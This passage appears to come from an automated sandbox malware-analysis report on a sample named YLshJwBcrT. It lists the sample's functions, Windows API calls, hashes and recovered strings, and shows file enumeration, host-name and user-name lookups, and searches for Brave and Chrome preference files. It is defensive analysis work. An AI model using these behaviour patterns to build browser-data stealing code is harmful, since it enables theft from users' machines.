                                  • Instruction Fuzzy Hash: A1F062355007146FD7243AB9A8CDB6AB6EDFF49736F100628EA42D20C0DB70E94946A3
                                  Function 022E0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNEL32(00000400,?,?,022E0223,?,?), ref: 022E0E19
                                  • SetErrorMode.KERNEL32(00000000,?,?,022E0223,?,?), ref: 022E0E1E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                  • Instruction ID: 53a1e4fbd78a44019b04391a038f3ae8355d6652015821f9a340369cd9bd9a6a
                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                  • Instruction Fuzzy Hash: 97D0123115512877DB003AD4DC09BCD7B1CDF09B66F448021FB0DE9080C7B0964146E5
                                  Function 004010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                  • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                  • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                  • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                  Function 00401190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                    • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                    • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                    • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                    • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                    • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                  • ExitProcess.KERNEL32 ref: 004011C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 1004333139-0
                                  • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                  • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                  • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                  • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                  Function 0085A7E5 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0085A836
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342767053.000000000085A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0085A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_85a000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                  • Instruction ID: abc93e4e1119d97e1634e867d0487b1bf0263ecb07c40242be787e8997ec9788
                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                  • Instruction Fuzzy Hash: 00112B79A00208EFDB01DF98C985E98BBF5EF08351F0580A4F9489B362D371EA94DB91

                                  Non-executed Functions

                                  Function 004138B0 Relevance: 47.5, APIs: 21, Strings: 6, Instructions: 250filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 004138CC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                  • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                  • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-817767981
                                  • Opcode ID: 147e69476bc17354b056f5ce00ba28a25639a4ba897131371b79271fd6134482
                                  • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                  • Opcode Fuzzy Hash: 147e69476bc17354b056f5ce00ba28a25639a4ba897131371b79271fd6134482
                                  • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                  Function 0040BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                                  • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                                  • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                                  • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-726946144
                                  • Opcode ID: ad623e4dddf2acf3531251e10fe9148c0028cfef02df62942197d5aa38f2a08f
                                  • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                                  • Opcode Fuzzy Hash: ad623e4dddf2acf3531251e10fe9148c0028cfef02df62942197d5aa38f2a08f
                                  • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                                  Function 00414910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 0041492C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                  • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                  • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                  • FindClose.KERNEL32(000000FF), ref: 00414B92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  • Opcode ID: f64dd78f470d60d5e6684bba1db7ab347a0029ed743c8e05a62c1da31839ea41
                                  • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                  • Opcode Fuzzy Hash: f64dd78f470d60d5e6684bba1db7ab347a0029ed743c8e05a62c1da31839ea41
                                  • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                  Function 022F3B17 Relevance: 31.8, APIs: 21, Instructions: 250filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 022F3B33
                                  • FindFirstFileA.KERNEL32(?,?), ref: 022F3B4A
                                  • lstrcat.KERNEL32(?,?), ref: 022F3B9C
                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 022F3BAE
                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 022F3BC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022F3ECE
                                  • FindClose.KERNEL32(000000FF), ref: 022F3EE3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID:
                                  • API String ID: 1125553467-0
                                  • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                  • Instruction ID: 952b6c6c87480ad450b957f1f740d4f13af54a33d405923b0fe96e5fa480afff
                                  • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                  • Instruction Fuzzy Hash: F4A170B5A50218ABDB74DFE4CC84FEEB37ABF49300F444598A60D96144EB749B84CF62
                                  Function 00414570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                  • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                  • wsprintfA.USER32 ref: 004145A6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                  • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                  • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                  • FindClose.KERNEL32(000000FF), ref: 004146A0
                                  • lstrcatA.KERNEL32(?,0088C588,?,00000104), ref: 004146C5
                                  • lstrcatA.KERNEL32(?,0088B228), ref: 004146D8
                                  • lstrlenA.KERNEL32(?), ref: 004146E5
                                  • lstrlenA.KERNEL32(?), ref: 004146F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 13328894-2848263008
                                  • Opcode ID: b19de660a787c585203e961524785ef4f8c7c5ebf2fdcdf8f42e36bc1f4495a2
                                  • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                  • Opcode Fuzzy Hash: b19de660a787c585203e961524785ef4f8c7c5ebf2fdcdf8f42e36bc1f4495a2
                                  • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                  Function 022F4B77 Relevance: 27.2, APIs: 18, Instructions: 172fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 022F4B93
                                  • FindFirstFileA.KERNEL32(?,?), ref: 022F4BAA
                                  • StrCmpCA.SHLWAPI(?,00420FDC), ref: 022F4BD8
                                  • StrCmpCA.SHLWAPI(?,00420FE0), ref: 022F4BEE
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022F4DE4
                                  • FindClose.KERNEL32(000000FF), ref: 022F4DF9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID:
                                  • API String ID: 180737720-0
                                  • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                  • Instruction ID: 8a96fbd99315f11866ddfb7799df7a3b88a99b978fc153fb39681307166f6792
                                  • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                  • Instruction Fuzzy Hash: BF6176B6950218ABCB24EFE0DD48FEAB3BDFB49700F404598A60D92144EB75A785CF91
                                  Function 022EC0D7 Relevance: 26.2, APIs: 17, Instructions: 675fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                  • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 022EC15C
                                  • StrCmpCA.SHLWAPI(?,004213F8), ref: 022EC1B4
                                  • StrCmpCA.SHLWAPI(?,004213FC), ref: 022EC1CA
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022ECA26
                                  • FindClose.KERNEL32(000000FF), ref: 022ECA38
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                  • Instruction ID: 515f4dc4328690271e4ef63c10740bfe72ce211f0698a665500e873e7073eb5a
                                  • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                  • Instruction Fuzzy Hash: 17424172920304ABCF54FBE4DD95EEDB37AAF94700F404169A60E96198EF349B48CF51
                                  Function 00413EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00413EC3
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                  • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                  • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                  • FindClose.KERNEL32(000000FF), ref: 00414081
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: 99b6f57015465be570b51e732a918a206cfe933a16528d1161771a5eb7529697
                                  • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                  • Opcode Fuzzy Hash: 99b6f57015465be570b51e732a918a206cfe933a16528d1161771a5eb7529697
                                  • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                  Function 022F47D7 Relevance: 22.6, APIs: 15, Instructions: 137stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 022F47E7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022F47EE
                                  • wsprintfA.USER32 ref: 022F480D
                                  • FindFirstFileA.KERNEL32(?,?), ref: 022F4824
                                  • StrCmpCA.SHLWAPI(?,00420FC4), ref: 022F4852
                                  • StrCmpCA.SHLWAPI(?,00420FC8), ref: 022F4868
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022F48F2
                                  • FindClose.KERNEL32(000000FF), ref: 022F4907
                                  • lstrcat.KERNEL32(?,0064A524), ref: 022F492C
                                  • lstrcat.KERNEL32(?,0064A22C), ref: 022F493F
                                  • lstrlen.KERNEL32(?), ref: 022F494C
                                  • lstrlen.KERNEL32(?), ref: 022F495D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID:
                                  • API String ID: 671575355-0
                                  • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                  • Instruction ID: f64c76d73fef15a40c69913949843d6cd838b9dcefb2fd7c36363173fe78561d
                                  • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                  • Instruction Fuzzy Hash: D65196B9550218ABCB60EFF0DD89FEEB37DAB58700F404598E70992194DBB49B84CF91
                                  Function 022F4107 Relevance: 18.1, APIs: 12, Instructions: 133fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 022F412A
                                  • FindFirstFileA.KERNEL32(?,?), ref: 022F4141
                                  • StrCmpCA.SHLWAPI(?,00420FAC), ref: 022F416F
                                  • StrCmpCA.SHLWAPI(?,00420FB0), ref: 022F4185
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022F42D3
                                  • FindClose.KERNEL32(000000FF), ref: 022F42E8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID:
                                  • API String ID: 180737720-0
                                  • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                  • Instruction ID: f552050cb3c24e044b2156bc477af6bd32f687b64f0bc92d96c1aec3e101da15
                                  • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                  • Instruction Fuzzy Hash: 1D5183B5910218BBCB24FBF0DC85EEAB37DBB48700F404598A74992044DBB5AB85CF95
                                  Function 0040ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 0040ED3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                  • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                  • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                  • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: 7c62be60ea4ce17a6daee6ca2e1ad8d80329f85963da6490b9882dd3eef46d84
                                  • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                  • Opcode Fuzzy Hash: 7c62be60ea4ce17a6daee6ca2e1ad8d80329f85963da6490b9882dd3eef46d84
                                  • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                  Function 0040DE10 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                  • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                  • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                  • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
